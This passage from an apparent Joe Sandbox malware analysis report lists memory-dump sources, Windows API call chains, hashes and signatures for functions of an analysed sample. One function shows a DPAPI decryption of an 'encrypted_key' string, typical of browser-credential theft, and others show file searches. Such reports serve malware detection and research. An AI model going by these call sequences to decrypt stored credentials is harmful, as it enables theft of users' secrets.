                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                    • String ID: $"encrypted_key":"$DPAPI
                    • API String ID: 2100535398-738592651
                    • Opcode ID: a683785744caff4a054845aa20987cafeec2bd1fc9226ec084573063a139413b
                    • Instruction ID: dbbe3c1c106beb746a5cb8ac749f477a655834e1eeb4d5d5769c5b0afb98eb7d
                    • Opcode Fuzzy Hash: a683785744caff4a054845aa20987cafeec2bd1fc9226ec084573063a139413b
                    • Instruction Fuzzy Hash: 1B3110B6D10109EBDF04DFE5DC85BEFB7B8AB88305F144519F915A7281EB349A08CBA1
                    APIs
                    • CreateFileA.KERNEL32(00963AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00963AEE,?), ref: 009692FC
                    • GetFileSizeEx.KERNEL32(000000FF,00963AEE), ref: 00969319
                    • CloseHandle.KERNEL32(000000FF), ref: 00969327
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSize
                    • String ID:
                    • API String ID: 1378416451-0
                    • Opcode ID: 30e7eb40b0d6d2706548e64ea1b9995f617c5d9a42add928a94ce24c5808ec9b
                    • Instruction ID: 913777a2108ed9a1c1ff4afb67362dc642d8b4ffb21a831890bbb892d5cf9b12
                    • Opcode Fuzzy Hash: 30e7eb40b0d6d2706548e64ea1b9995f617c5d9a42add928a94ce24c5808ec9b
                    • Instruction Fuzzy Hash: 26F04935E40208BBDF10DFF0DD59F9E77BDAB48720F20C654BA51A72C0DA78AA018B80
                    APIs
                    • __getptd.LIBCMT ref: 0096C74E
                      • Part of subcall function 0096BF9F: __amsg_exit.LIBCMT ref: 0096BFAF
                    • __getptd.LIBCMT ref: 0096C765
                    • __amsg_exit.LIBCMT ref: 0096C773
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0096C797
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                    • String ID:
                    • API String ID: 300741435-0
                    • Opcode ID: bf846de6e3aef049daf7a909a4f31997af85558a1fe7117b24d2b486e9d9d533
                    • Instruction ID: cf8caf726488afad13b5eba5795d6bd178deeb72a3308b6dad838ebdcd299d5e
                    • Opcode Fuzzy Hash: bf846de6e3aef049daf7a909a4f31997af85558a1fe7117b24d2b486e9d9d533
                    • Instruction Fuzzy Hash: DDF0BEB29053019BD720BBB89807B6E33A06F80720F204149F598F62E2EF6459819F5A
                    APIs
                      • Part of subcall function 00968DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00968E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00964F7A
                    • lstrcat.KERNEL32(?,00971070), ref: 00964F97
                    • lstrcat.KERNEL32(?,005B9268), ref: 00964FAB
                    • lstrcat.KERNEL32(?,00971074), ref: 00964FBD
                      • Part of subcall function 00964910: wsprintfA.USER32 ref: 0096492C
                      • Part of subcall function 00964910: FindFirstFileA.KERNEL32(?,?), ref: 00964943
                      • Part of subcall function 00964910: StrCmpCA.SHLWAPI(?,00970FDC), ref: 00964971
                      • Part of subcall function 00964910: StrCmpCA.SHLWAPI(?,00970FE0), ref: 00964987
                      • Part of subcall function 00964910: FindNextFileA.KERNEL32(000000FF,?), ref: 00964B7D
                      • Part of subcall function 00964910: FindClose.KERNEL32(000000FF), ref: 00964B92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                    • String ID:
                    • API String ID: 2667927680-0
                    • Opcode ID: bd949531dc21a117bca1a8e012c06b4d5c12f029629078ccbf0eea654aaab282
                    • Instruction ID: 0d74a0e899d582e289a34d235b6087a7a82583aeab205b4d3c9c1a65c49d2b6e
                    • Opcode Fuzzy Hash: bd949531dc21a117bca1a8e012c06b4d5c12f029629078ccbf0eea654aaab282
                    • Instruction Fuzzy Hash: AE216576900208A7CB54FBB0DD86FEA337CABD4700F004559B65997191EE74AAC9CBE2